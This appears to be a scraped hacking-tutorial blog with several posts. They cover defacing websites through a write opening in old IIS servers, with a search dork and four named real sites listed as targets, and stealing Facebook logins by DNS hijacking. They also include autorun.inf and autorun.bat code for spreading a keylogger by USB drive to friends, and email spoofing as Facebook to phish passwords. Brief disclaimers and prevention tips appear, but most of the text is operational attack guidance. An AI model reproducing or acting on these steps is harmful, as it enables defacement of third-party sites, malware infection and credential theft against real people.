How to Hack websites using IIS exploit | IIS File Upload exploit

This tutorial is about website hacking that are working on older versions of IIS server. We will be discussing about what is a IIS server and how to upload deface pages on it.

 

Q) What is IIS Server ?
A) IIS [Internet Information Service] is a web server developed by Microsoft to use with Mircosoft Operating systems.

How to Use IIS exploit :-

For Windows XP :
1)Go to start the click on run.
2)Copy the folowing code and paste it in run command:-

%WINDIR%EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::     {BDEADF00-C265-11d0-BCED-00A0C90AB50F}

3)Click on ok.
4)A folder named “Web Folders” will open.
5)Right click in the folder and click on “New” and then click on “Web folder”.
6)A dialogue box will open.
7)Enter the url of the vulnerable site and click on next.
8)If no error comes up the sites is vulnerable else try any other siite.
9)After pressing “Next” in step 7 it will ask you to name that web folder, enter any name you want.
10)Open that folder and copy your defaced html page to that folder.
 
For windows 7:
1) Go to My computer >> Right Click >> Select “Add a Network Location” .
2) Click on “Next” >> Choose the first option in the next screen >> Click “Next “.
3) Now enter the URL of the Vulnerable Site and Click on “Next” .
4) Now you will see a folder with name of that site, Open that folder and upload that file.

The link to your defaced page will be like “”http://vulnerablesite.net/mypage.html”" 
where mypage.html is the defaced page i uploaded.


Dork : “Powered By IIS ”
Search this dork in google to search for vulnerable sites.
Some Vulnerable site:-
z6.cn
derakhshan.parniansis.com
ebnesina.parniansis.com
emkhaleghiyeyzd.parniansis.com

Read More

DNS Hijacking | How to hack Facebook accounts using it

Hi Guys, I am back after a long time and I have got something amazing for you guys. In this tutorial I am going to show you how to Hack facebook accounts by DNS hijacking!

WHAT IS DNS?

 is a network protocol whose job is to map a user friendly name like tutorials for you to its corresponding IP address like “173.245.61.120″.

What is DNS Hijacking?

DNS HIjacking also known as (DNS redirection), is a kind of malicious attack that overrides a computer’s TCP/IP settings to direct it at a fake DNS server, thereby disconfirming the default DNS settings.As we tend to all recognize, the “Domain Name System (DNS)” is there to translate a user friendly name like “google.com” to its corresponding IP Address “74.125.235.46″.

So How DNS Hijacking Works?

As mentioned before, DNS is that the one that’s responsible for mapping the user friendly domain names to their corresponding IP addresses. This DNS server is closely-held and maintained by your Internet service Provider(ISP) and lots of alternative business organizations.
By default, your laptop is organized to use the DNS server from the ISP. In some cases, your laptop could even use the DNS services of alternative organizations like Google or OpenDNS. Imagine a scenario wherever a hacker or a malware program gains unauthorized access to your laptop and changes the DNS settings, so your laptop currently uses one amongst the malicious DNS servers that’s maintained by the hacker. once this happens, the malicious DNS server could translate domain names of interesting websites (such as banks, search engines, social networking sites etc.) to IP addresses of malicious websites having a similar design to original site. As a result, you will be taken to a pretended web site rather than the one you’re intending for.

What are the Dangers of DNS Hijacking?

The dangers of DNS hijacking will vary and depend upon the intention behind the attack. several ISPs like “OpenDNS” and “Comcast” use DNS hijacking for introducing advertisements or aggregation statistics. Even though doing this may cause no serious harm to the users, it’s thought-about as a violation of RFC standards for DNS responses.

Other dangers of DNS hijacking :

Pharming: This is often a sort of attack wherever a web site’s traffic is redirected to a different website that’s a faux one. As an example, once a user tries to go to a social networking web site like Facebook.com he is also redirected to a different web site that’s stuffed with pop-ups and advertisements, this is often done by hackers so as to come up with advertising revenue.

Phishing: This is often a sort of attack wherever users is redirected to a malicious web site whose style (look and feel) matches specifically with the initial one. As an example, once a user tries to log in to his checking account, he is redirected to a malicious website that steals his login details.
So this way 1 can hack facebook accounts. He can create a program to change your DNS address and could redirect it to his rogue DNS address. That DNS will redirect the request of facebook.com to some fake Facebook site, a Facebook phisher which could steal your login credentials.
To know more about Phishing, read What is Phishing How to Hack Facebook accounts using Phishing

How to Prevent DNS Hijacking?

In most cases, attackers create use of malware programs like a worm to carry out DNS hijacking. These DNS hijacking trojans are usually distributed as video and audio codecs, video downloaders, YouTube downloaders or as alternative free utilities. So, so as to remain protected, it’s suggested to remain aloof from untrusted websites that supply free downloads. The DNSChanger trojan is a very good example of 1 such malware that hijacked the DNS settings of over four million computers to drive a profit of concerning fourteen million USD through deceitful advertising revenue.

Also, it’s necessary to change the default password of your router, in order to stop someone to change your router settings to exploit your DNS settings to hack you.
Installing an original antivirus program and keeping it up-to-date offers an excellent deal of protection to your pc against any such attacks.

What if you are already a victim of DNS hijacking?

If you think that your laptop is infected with a malware program like DNSChanger, do not panic. All you have got to try and do is, simply verify your current DNS settings to check if the DNS address is the same as that provided by your ISPs. Otherwise re-configure your DNS settings as per the rules of your ISP.

I hope you would like my articles related to Hacking and Security!
Leave your queries and feedbacks in comments.

Read More

What is Autorun.inf and how to use it ? | Autorun.inf Virus

This tutorial is about using autorun.inf file to spread keylogger/rat via pendrive or another removable device. A detailed tutorial about autorun virus. Read this post carefully and don’t forget to leave your feedback comments in.
In windows XP it will automatically execute the instructions while in other versions of windows it will ask the user .

Q)what is autorun.inf ?

A) Autorun.inf file is a simple text file containing list of instructions to be followed by the Operating System. Whenever a CD/USB is plugged in, the system searches for this autorun file, and if found it executes all the instructions present in this file.

Q) Why it is used?

A) It is used to execute files automatically whenever a CD/Usb is plugged in. It can also change the icon of the usb/cd drive .

Steps:-

1) Creating autorun.inf :-
1.a) Open notepad and copy the followig code to it.
[autorun]
open=autorun.bat
icon=anything.ico

Here autorun.bat is the file we want to execute when our CD/USB is inserted.
Anything.ico is the name of icon file we want to set to our CD/USB drive.

2) Creating autorun.bat :-
2.a) Copy the following code [Edit it accordingly]
@echo off
start /location of the keylogger

Ex 1 :- If it is saved in a folder named rishabh which is present in the root directory of CD/USB. Then the code should be edited like this
@echo off
start rishabh/keylogger.exe

Ex 2 :- If the keylogger is placed in theroot directory then the code should be like this :-
@echo off
start keylooger.exe

2.b) Save it as autorun.bat and place it in the root directory of the CD/USB.

3) Give this CD/USB to your friends and when they will insert this in their systems, the will be infected with your keylooger.

Disabling Autorun :

1) Go to RUN and type gpedit.msc and hit ok.
2) Browse toComputer Configuration >>Administrative Templates >> Windows Components >>Autoplay Policies .
3) In details pane, double-click Turn off Autoplay.
4) Click Enabled, and then select All drives in the Turn off Autoplay box to disable Autorun on all drives.

IMPORTANT NOTE :- This guide is for academic purposes solely, Use at your own risk.

Read More

How to send an anonymous email | Create fake email sender

Hi guys! I am back with another amazing and mind blowing tutorials for my reader. In this tutorial I am going to explain you how to send an anonymous email to someone. You must be thinking what is the purpose to send an anonymous email, I will be explaining that too in this detailed post.

What is Email Spoofing?

Email Spoofing is a process of faking source address of an Email. It means that we can show that email has been sent from someone else. This could be quite useful in various client side hacking techniques and is an important part of Social Engineering.
Using Email Spoofing techniques you can send fake emails to users to win their trust in order to execute our attack. Since the source address will be fake(Probably a mail from some famous trusted company) our victim will believe the mail and will be hacked.

Example use of Email Spoofing :

You can create a Facebook password change form having looks similar to that of Facebook, after that you send the link of the online form to the victim by spoofing the source address as of Facebook like password@facebook.com or something like that. This way user will believe that the mail is from Facebook and will surely enter his credentials.

How to send an anonymous mail :

Now let us discuss about the actual steps involved in sending anonymous or fake mails.

1) You first need an fake email sender. You could either use some online fake email senderlike :

Emkei.cz
anonymailer.net
Anonymizer.in

Or You could even create your own Fake email sender.

2) To create Your own Email account Spoofer you need following things :

2.1) Fake Email Sender script : This script is a PHP mail script using which we can change the source address of an email. Download it from here.

2.2) Free hosting service : You need a hosting service in order to host the PHP mail file. There are many free hosting services which provides a free domain too. We will use some free service like x10hosting.com. Create an account there an upload your php file there. Your link will be username.x10hosting.com/mail.php.
You could also try some other free web hosting service like :
phpnet.us
0000webhost.com
zymic.com

3) So now you have your own Fake Email sender. You now have to use this script to send fake emails to your victim.

4) In receiver’s address add the email id of your victim.

5) In sender’s address add the email of some reputed company like contact@facebook.comor something like that.

6) Enter a legit looking subject and message in order to make the victim believe in our email. Just click on send button after that. Your victim will the receive a email fromcontact@facebook.com

Chechout the image for information :

7) You can use the same way to send fake mails from any Email ID to any other Email ID.

So far we have discussed about how to send an anonymous email. Now I will tell you how you can distinguish between original and fake emails to prevent yourself from frauds. You can check the emails you doubt using the following to check whether their source is legit or not.

To check Email source follow these steps :

1) Open the email you want to check whether it is fake or not.

2) Open the Email header for that Email. To open headers for an email click on “Show headers” or “Show original” ( depends on the email service you are using).

3) There you will see a field of “received from : “, You will see a IP address against that field.

4) Copy the IP Address and trace its location.( Will explain tracing location too in my next post.)

I hope you will not use the information explained above for any type of blackhat purpose. Keep learning and Keep visiting

Read More

5 Things Every Beginner Hacker Should Know

Hello All,
This is my first blog post!

This post is for everyone out there who actually want to become a true hacker:-

1) Never trust sites that ask you for money in return of Hacking Softwares or who claim to Hack Email Id’s in return of money. All such things are Scam . Nothing Works.

2) There is NO DIRECT SOFTWARE  to Hack Facebook , Google , Yahoo or any other big website. All the softwares that claim to do so are scam. They are just meant to take your money and in worse cases, those softwares have trojans or keyloggers in them. As a result your account gets hacked trying to hack others.

3) NEVER EVER use the keyloggers or trojans you find as freeware on internet. Hackers are not fools. They compile keyloggers and trojans almost with any such software and when you install them , you are already hacked before even trying to hack others.

4) You are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only ready made softwares and would depend on them for hacking anything then your functionality would be limited upto the functionality of the software. When you are not going to use your brain , just doing the copy paste thing, then how can you even think of being a good hacker.

5) If you are a good Hacker, you already become a good programmer , a good script writer , a good web developer and an excellent security expert. Well any good Hacker will/should have good knowledge of various aspects and programming languages. to do XSS (Cross Site Scripting ) , PHP INJECTION , SQL INJECTION , PHISHING , FOOTPRINTING etc… you will have to be good at programing and scripting. And when you know the Various loop holes , vulnerabilities and security tips, you already become a Computer Security Expert.

So Never Ever Under estimate the term Hacker. A Hacker Is Not a person who just hacks email id’s or servers but a True Hacker is a Computer Genius who the knowledge of computers more than anyone.

Next time think before asking the question – “How much Will I get in this field?” because, if you have so many skills , you really don’t have to run after money. Success comes and money follows itself.

Read More